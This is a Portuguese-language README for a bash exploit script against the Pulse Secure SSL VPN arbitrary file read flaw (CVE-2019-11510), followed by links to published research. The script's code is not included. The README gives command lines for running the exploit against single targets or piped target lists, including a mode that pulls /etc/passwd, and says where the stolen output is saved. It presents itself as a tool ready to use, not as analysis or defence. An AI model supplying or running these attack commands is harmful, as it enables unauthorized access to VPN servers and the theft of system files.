
Exploit para Leitura Arbitrária de Arquivos no Pulse Secure SSL VPN (CVE-2019-11510)
Exploit para leitura arbitrária de arquivos no Pulse Secure SSL VPN (CVE-2019-11510)
Você pode usar um único domínio ou uma lista de domínios. Você deve incluir https:// na frente do domínio.
Uso : cat targetlist.txt | bash CVE-2019-11510.sh / bash CVE-2019-11510.sh -d https://vpn.target.com/
Se você quiser apenas verificar o exploit e baixar o /etc/passwd, use :
cat targetlist.txt | bash CVE-2019-11510.sh --only-etc-passwd
bash CVE-2019-11510.sh -d https://vpn.target.com/ --only-etc-passwd
A saída será salva dentro de output/vpn.target.com/
Demonstração :
https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html
https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html
https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf